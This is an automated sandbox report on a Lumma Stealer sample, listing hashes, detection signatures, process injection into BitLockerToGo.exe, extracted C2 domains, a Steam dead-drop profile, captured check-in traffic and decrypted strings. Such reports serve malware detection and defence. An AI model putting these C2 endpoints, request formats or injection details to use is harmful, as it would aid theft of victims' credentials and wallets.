
Windows Analysis Report
BW4pTs1x3V.exe

Overview

General Information

Sample name: BW4pTs1x3V.exe (renamed because the original name is a hash value)
Original sample name: 2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509.exe
Analysis ID: 1524036
MD5: 3677ebc159e92251f19020e9ab4b62ad
SHA1: 561483bb3f3ae9d384d21670f184a7c3fc9cf9c5
SHA256: 2fad7f1752f7c3f57c038bf09359093471523172c08572117eaba2556e859509
Tags: exe, GuizhouSixuandaTechnologyCoLtd, user-JAMESWT_MHT

Detection

LummaC, Go Injector, LummaC Stealer
Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BW4pTs1x3V.exe (PID: 1668 cmdline: "C:\Users\user\Desktop\BW4pTs1x3V.exe" MD5: 3677EBC159E92251F19020E9AB4B62AD)
    • BitLockerToGo.exe (PID: 6736 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fragnantbui.shop", "gutterydhowi.shop", "vozmeatillu.shop", "dividenntykw.shop", "drawzhotdog.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "ghostreedmnu.shop"], "Build id": "c2CoW0--advert22"}
Source | Rule | Description | Author
BW4pTs1x3V.exe | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security
00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.1887668238.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security
00000000.00000000.1452154530.00007FF67D7C0000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security
Process Memory Space: BW4pTs1x3V.exe PID: 1668 | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
0.0.BW4pTs1x3V.exe.7ff67ce60000.0.unpack | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security
0.2.BW4pTs1x3V.exe.7ff67ce60000.7.unpack | JoeSecurity_GoInjector_2 | Yara detected Go Injector | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T14:55:29.335432+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.188.210 | 443 | TCP
2024-10-02T14:55:32.267885+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.209.193 | 443 | TCP
2024-10-02T14:55:29.335432+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.188.210 | 443 | TCP
2024-10-02T14:55:32.267885+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 172.67.209.193 | 443 | TCP
2024-10-02T14:55:29.551416+0200 | 2056156 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 60353 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.563128+0200 | 2056154 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 54180 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.371418+0200 | 2056162 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49364 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.359107+0200 | 2056164 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 57693 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.383142+0200 | 2056160 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59759 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.584440+0200 | 2056150 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 64498 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.573766+0200 | 2056152 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 63806 | 1.1.1.1 | 53 | UDP
2024-10-02T14:55:29.464436+0200 | 2056158 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59623 | 1.1.1.1 | 53 | UDP

AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
Source: 3.2.BitLockerToGo.exe.2cd0000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["fragnantbui.shop", "gutterydhowi.shop", "vozmeatillu.shop", "dividenntykw.shop", "drawzhotdog.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "ghostreedmnu.shop"], "Build id": "c2CoW0--advert22"}
Source: BW4pTs1x3V.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: reinforcenh.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: stogeneratmns.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: fragnantbui.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: drawzhotdog.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: vozmeatillu.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: offensivedzvju.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: ghostreedmnu.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: gutterydhowi.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: dividenntykw.shop
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1919231002.0000000002CD0000.00000040.00000400.00020000.00000000.sdmp | String decryptor: c2CoW0--advert22
Source: BW4pTs1x3V.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 172.67.188.210:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: BW4pTs1x3V.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp

Networking

                barindex
                Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.8:60353 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.8:59623 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.8:59759 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.8:57693 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.8:63806 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.8:49364 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.8:64498 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.8:54180 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49718 -> 172.67.209.193:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49716 -> 172.67.188.210:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49718 -> 172.67.209.193:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.188.210:443
                Source: Malware configuration extractorURLs: fragnantbui.shop
                Source: Malware configuration extractorURLs: gutterydhowi.shop
                Source: Malware configuration extractorURLs: vozmeatillu.shop
                Source: Malware configuration extractorURLs: dividenntykw.shop
                Source: Malware configuration extractorURLs: drawzhotdog.shop
                Source: Malware configuration extractorURLs: offensivedzvju.shop
                Source: Malware configuration extractorURLs: reinforcenh.shop
                Source: Malware configuration extractorURLs: stogeneratmns.shop
                Source: Malware configuration extractorURLs: ghostreedmnu.shop
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dividenntykw.shop
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global traffic DNS traffic detected: DNS query: dividenntykw.shop
                Source: global traffic DNS traffic detected: DNS query: gutterydhowi.shop
                Source: global traffic DNS traffic detected: DNS query: ghostreedmnu.shop
                Source: global traffic DNS traffic detected: DNS query: offensivedzvju.shop
                Source: global traffic DNS traffic detected: DNS query: vozmeatillu.shop
                Source: global traffic DNS traffic detected: DNS query: drawzhotdog.shop
                Source: global traffic DNS traffic detected: DNS query: fragnantbui.shop
                Source: global traffic DNS traffic detected: DNS query: stogeneratmns.shop
                Source: global traffic DNS traffic detected: DNS query: reinforcenh.shop
                Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic DNS traffic detected: DNS query: gravvitywio.store
                Source: unknown HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: dividenntykw.shop
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/apix
                Source: BW4pTs1x3V.exeString found in binary or memory: https://www.certum.pl/CPS0
                Source: BW4pTs1x3V.exeString found in binary or memory: https://www.globalsign.com/repository/0
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownHTTPS traffic detected: 172.67.188.210:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07C60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02D07C60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07C60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02D07C60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07DE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_02D07DE0

                System Summary

Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDF950
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDFFE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD1293
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D18370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CE301B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDB1C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD7150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDA110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD5130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDA660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D077C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CFC75E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D16720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D184C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD84F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF74AA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D0E449
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D13430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CFB5B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD3570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CE0A8F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF2AA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF7A42
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF7A60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D07A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D01A32
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF8BE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CD7B50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF88F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D0D850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D17800
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CFB9F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CE0E50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF7E26
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CECFA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CDBCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02D0ECB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_02CF7C20
